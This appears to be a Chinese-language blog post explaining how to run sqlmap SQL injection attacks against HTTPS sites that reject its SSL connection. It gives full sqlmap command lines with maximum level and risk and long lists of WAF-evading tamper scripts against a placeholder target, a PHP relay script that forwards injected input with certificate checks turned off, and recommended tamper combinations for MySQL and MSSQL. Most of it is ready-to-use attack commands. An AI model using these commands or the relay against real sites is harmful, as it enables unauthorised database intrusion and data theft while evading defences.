By

总阅读

文章目录

对于https网站,使用sqlmap可能会出现如下错误。使用–force-ssl无效。
[14:19:03] [CRITICAL] can’t establish SSL connection

对于https网站,使用sqlmap可能会出现如下错误。使用–force-ssl无效。
[14:19:03] [CRITICAL] can’t establish SSL connection

方法一:

1
python sqlmap.py -u https://www.xxxx.com/?id=2* --level 5 --risk 3 --dbms MYSQL --tamper=between,bluecoat,charencode,charunicodeencode,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords --proxy http://127.0.0.1:8888 --random-agent

127.0.0.1:8888是本地charles地址

方法2:

本地建立proxy.php,内容为

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<?php
 
$url = "https://xxxxx.com/id=2";
$sql = $_GET[s];
$s = urlencode($sql);
$url = $url.$sql;
// $params = "email=$s&password=aa";
//echo $params;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); // https请求 不验证证书和hosts
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; MSIE 5.01; Windows NT 5.0)');
curl_setopt($ch, CURLOPT_TIMEOUT, 15);
  
// curl_setopt($ch, CURLOPT_POST, 1);    // post 提交方式
// curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
  
$output = curl_exec($ch);
curl_close($ch);
echo $output;
$a = strlen($output);
echo $a;

使用下面语句忽略证书

1
2
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); // https请求 不验证证书和hosts
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);

使用

1
python sqlmap.py -u http://127.0.0.1/proxy.php?s=2* --level 5 --risk 3 --dbms MYSQL --tamper=between,bluecoat,charencode,charunicodeencode,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords  --random-agent

最后分享下一些tamper组合姿势

一般:
tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

MSSQL:
tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

MySQL的:
tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

参考文章:https://www.cnblogs.com/depycode/p/5288243.html

文章目录